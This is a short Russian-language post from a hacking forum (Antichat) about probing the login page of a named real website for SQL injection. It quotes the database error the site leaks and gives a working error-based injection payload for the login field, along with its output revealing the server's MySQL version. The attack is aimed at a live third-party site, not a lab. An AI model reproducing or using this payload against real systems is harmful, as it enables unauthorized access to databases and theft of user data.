
28.11.2012, 18:26
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от MorganFr
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?
Код:
http://www.sdelanounas.ru/index/loginPage/
Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:
Код:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1
Пробовал в Haviji POST запросом, ничего не вышло.
login=' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#
password=1
Duplicate entry '5.0.51a-24+lenny5-log' for key 1
|
|
|